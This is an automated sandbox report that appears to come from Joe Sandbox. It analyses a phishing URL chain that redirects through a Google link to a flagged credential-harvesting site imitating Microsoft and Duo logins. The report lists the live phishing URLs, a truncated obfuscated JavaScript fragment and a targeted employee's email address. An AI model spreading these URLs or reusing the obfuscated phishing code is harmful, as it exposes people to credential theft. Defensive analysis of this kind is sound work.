Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==

Overview

General Information

Sample URL:https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==
Analysis ID:1557370
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
HTML page contains obfuscated javascript
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6248 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1896,i,3868343366678002382,12767044061446942759,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://supernova.hethantac.com/3XdZQxT/Avira URL Cloud: Label: phishing
Source: https://supernova.hethantac.com/favicon.icoAvira URL Cloud: Label: phishing
Source: https://supernova.hethantac.com/3XdZQxT/Virustotal: Detection: 5%Perma Link

Phishing

barindex
Source: http://plimmerton.org.nz/jugz/#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==HTTP Parser: function _0x2136(){const _0x7de785=['OQdkG','urope.com/','TDiJx','https://re','GrroA','br/.gg/','
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5HTTP Parser: Number of links: 0
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: Number of links: 1
Source: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=TrueHTTP Parser: Number of links: 0
Source: https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46HTTP Parser: Number of links: 1
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 00f04fea-e8f2-40c9-b209-3585baf3fd82998262e4-dbfd-4f41-99ad-051fa711345c
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: <input type="password" .../> found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46HTTP Parser: <input type="password" .../> found
Source: https://supernova.hethantac.com/3XdZQxT/#MJamie.Bell@elkamet.comHTTP Parser: No favicon
Source: https://supernova.hethantac.com/3XdZQxT/#MJamie.Bell@elkamet.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5HTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=TrueHTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=TrueHTTP Parser: No <meta name="author".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5HTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=TrueHTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=TrueHTTP Parser: No <meta name="copyright".. found
Source: https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-10-1.bdicJump to behavior
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:55125 version: TLS 1.2
